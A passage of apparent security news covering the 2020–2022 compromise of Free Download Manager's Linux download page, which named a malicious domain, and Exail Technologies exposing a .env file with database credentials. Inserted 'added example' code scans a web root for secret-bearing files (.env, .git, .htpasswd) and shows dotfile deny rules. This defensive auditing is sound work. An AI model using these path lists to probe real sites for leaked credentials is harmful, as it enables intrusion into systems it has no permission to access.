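        print(f'{script}:{line_no}: {reason}: {line}')
```

Against a downloaded package the call is `audit_deb(open('pkg.deb', 'rb').read())`; `dpkg-deb -e pkg.deb outdir` extracts the same control area if you prefer to read the scripts by hand. A hit is a reason to read the script, not proof of compromise: legitimate packages do use temp directories and cron, but a download manager has no business writing a root cron job that runs a binary out of /var/tmp.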

The maintainers of Free Download Manager (FDM) have now shared the findings of their own investigation: a Ukrainian hacker group compromised a specific web page on their website and used it to distribute the malware.

“Today, informed by the findings from Kaspersky Lab, we became aware of a past security incident from 2020. It appears that a specific web page on our site was compromised by a Ukrainian hacker group, exploiting it to distribute malicious software.” reads the announcement published by the maintainers. “Only a small subset of users, specifically those who attempted to download FDM for Linux between 2020 and 2022, were potentially exposed. It’s estimated that much less than 0.1% of our visitors might have encountered this issue. This limited scope is probably why the issue remained undetected until now. Intriguingly, this vulnerability was unknowingly resolved during a routine site update in 2022.”

The maintainers estimate that the page served the malware to a very small share of visitors, much less than 0.1%, which is why the supply chain attack remained undetected for years.

The maintainers announced the enhancement of their defenses and the implementation of additional measures to prevent similar security incidents in the future.

Visitors who attempted to download FDM for Linux from the compromised page during that timeframe are advised to scan their systems for malware and change their passwords.

The maintainers determined that the threat actors exploited a vulnerability in a script on their website to inject the malicious code.

The analysis of files that were part of the site before the compromise (dating back to 2020) revealed the presence of a portion of code used to choose whether to give users the correct download link or a link to the malware-laced version of the files.

“To investigate this problem, we accessed data from our project backups dating back to 2020 and found this modified page, which contained an algorithm that chose whether give users correct download link or the one leading to the fake domain deb.fdmpkg.org containing a malicious .deb file. It had an «exception list» of IP addresses from various subnets, including those associated with Bing and Google.” continues the announcement. “Visitors from these IP addresses were always given the correct download link.”

FDM has released a script to check for indicators of compromise (IoCs).


Pierluigi Paganini

(SecurityAffairs – hacking, Free Download Manager)


Space and defense tech maker Exail Technologies exposes database access

Exail Technologies, a high-tech manufacturer whose clients include the US Coast Guard, exposed sensitive company data that could’ve enabled attackers to access its databases.

Exail, a French high-tech industrial group, left exposed a publicly accessible environment (.env) file with database credentials, the Cybernews research team has discovered.

The company, formed in 2022 after ECA Group and iXblue merged, specializes in robotics, maritime, navigation, aerospace, and photonics technologies, making it a particularly juicy target for attackers.

The company fixed the issue after being contacted by our research team. We reached out to Exail for further comment but did not receive a response before publishing.

What Exail data was exposed?

The publicly accessible .env file, hosted on the exail.com website, was exposed to the internet, meaning that anyone could have accessed it.

An environment file holds the configuration values an application loads at startup, typically including database credentials and API keys. Leaving it open to anyone can therefore expose critical data and give threat actors an array of options for attacking.

According to the team, Exail’s exposed .env file contained database credentials. Had the database itself been reachable from the internet, attackers could have used the credentials to access the company’s data; in this case, however, the database was not publicly exposed.

“Once inside, attackers could view, modify, or delete sensitive data and execute unauthorized operations. The publicly hosted environment was exposed to the internet, meaning that anyone could’ve used these credentials to access sensitive information stored in this database,” researchers explained.
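An exposed .env is usually a deployment mistake: the file is copied next to the public files and the web server serves it like any other static asset. The following added example, not from CyberNews or Exail, is the pre-deploy check that catches this; it walks a document root, lists paths a static server should never hand out, and names the credential-like variables in any .env it finds. The sample web root is constructed in a temporary directory and its contents are made up.

```python
"""Pre-deploy check for secrets left in a web root.

Added example, not from the CyberNews write-up. It walks a document root the
way a static file server would, reports paths that must never be served
(.env files, VCS metadata, dumps, editor backups), then parses any .env it
finds and lists credential-like variable names, never their values. The
sample tree is built in a temporary directory; its contents are made up.
"""
import os
import re
import tempfile

NEVER_SERVE = re.compile(
    r'(^|/)(\.env(\..+)?|\.git|\.svn|\.htpasswd|\.DS_Store|[^/]*\.(sql|bak|old|swp)|[^/]*~)$')
SECRET_NAME = re.compile(r'PASS|SECRET|TOKEN|KEY|DSN|DATABASE_URL', re.I)


def exposed_paths(webroot):
    """Relative paths under webroot that a static server would hand out but should not."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot)
        for d in list(dirnames):
            rel = os.path.normpath(os.path.join(rel_dir, d)).replace(os.sep, '/')
            if NEVER_SERVE.search(rel):
                hits.append(rel + '/')
                dirnames.remove(d)          # the directory itself is the finding; don't descend
        for f in filenames:
            rel = os.path.normpath(os.path.join(rel_dir, f)).replace(os.sep, '/')
            if NEVER_SERVE.search(rel):
                hits.append(rel)
    return sorted(hits)


def env_secret_names(path):
    """Variable names in a dotenv file that look like credentials and have a value set."""
    names = []
    with open(path, encoding='utf-8', errors='replace') as fh:
        for raw in fh:
            line = raw.strip()
            if not line or line.startswith('#'):
                continue
            if line.startswith('export '):
                line = line[len('export '):]
            name, sep, value = line.partition('=')
            if sep and SECRET_NAME.search(name) and value.strip().strip('"\''):
                names.append(name.strip())
    return names


def audit_webroot(webroot):
    """Return {'exposed': [...], 'env_names': {env_path: [names]}}."""
    report = {'exposed': exposed_paths(webroot), 'env_names': {}}
    for rel in report['exposed']:
        if os.path.basename(rel).startswith('.env'):
            report['env_names'][rel] = env_secret_names(os.path.join(webroot, rel))
    return report


def build_sample_webroot():
    """Constructed document root: one public page plus the usual leftovers."""
    root = tempfile.mkdtemp(prefix='webroot-')
    files = {
        'index.html': '<h1>hello</h1>\n',
        '.env': ('APP_ENV=production\nDB_HOST=db.internal\nDB_USER=app\n'
                 'DB_PASSWORD=example-only\nAPP_KEY=base64:example\n'),
        '.git/HEAD': 'ref: refs/heads/main\n',
        'assets/logo.svg': '<svg/>\n',
        'assets/db.sql': '-- dump\n',
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(content)
    return root


if __name__ == '__main__':
    report = audit_webroot(build_sample_webroot())
    for rel in report['exposed']:
        extra = ', '.join(report['env_names'].get(rel, []))
        print(rel + (f'  (credential-like names: {extra})' if extra else ''))
```

Run it against the directory you are about to publish; the external equivalent on a live site is simply requesting /.env and expecting a 404. Deny dotfiles at the server as well (nginx `location ~ /\. { deny all; }`, Apache `<FilesMatch "^\.">` with `Require all denied`), and keep secrets out of the document root entirely by loading them from the environment or a secrets manager rather than a file beside the public assets.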

Dangerous flavors

According to the team, Exail’s web server version and operating system (OS) flavor were also exposed. OS flavor refers to a specific system version with its own features, configurations, software packages, and other specifications.

Exposing this type of data poses a wide array of dangers. Different OSs have specific sets of vulnerabilities, such as unpatched security flaws, default configurations, and known weaknesses.

“If a malicious actor is aware of the OS flavor and version running on the web server, they could target specific vulnerabilities associated with the OS,” researchers said.

Additionally, an exposed web server with known OS flavors could become a target for automated scanning tools, malware, and botnets.

“Once an attacker knows the OS flavor, they can focus their efforts on finding and exploiting vulnerabilities specifically associated with that OS. They can employ techniques like scanning, probing, or using known exploits to gain access to the server or compromise its security,” the team explained.

The attackers could also leverage OS-specific weaknesses to launch denial of service (DoS) attacks against the exposed web server and overwhelm it with a flood of requests, disrupting the server’s operations.

For the recommendations CyberNews provided to Exail, see the original post on CyberNews:

https://cybernews.com/security/exail-technologies-expose-database-access/

About the author: Vilius Petkauskas, Deputy Editor at CyberNews


Pierluigi Paganini

(SecurityAffairs – hacking, Exail Technologies)

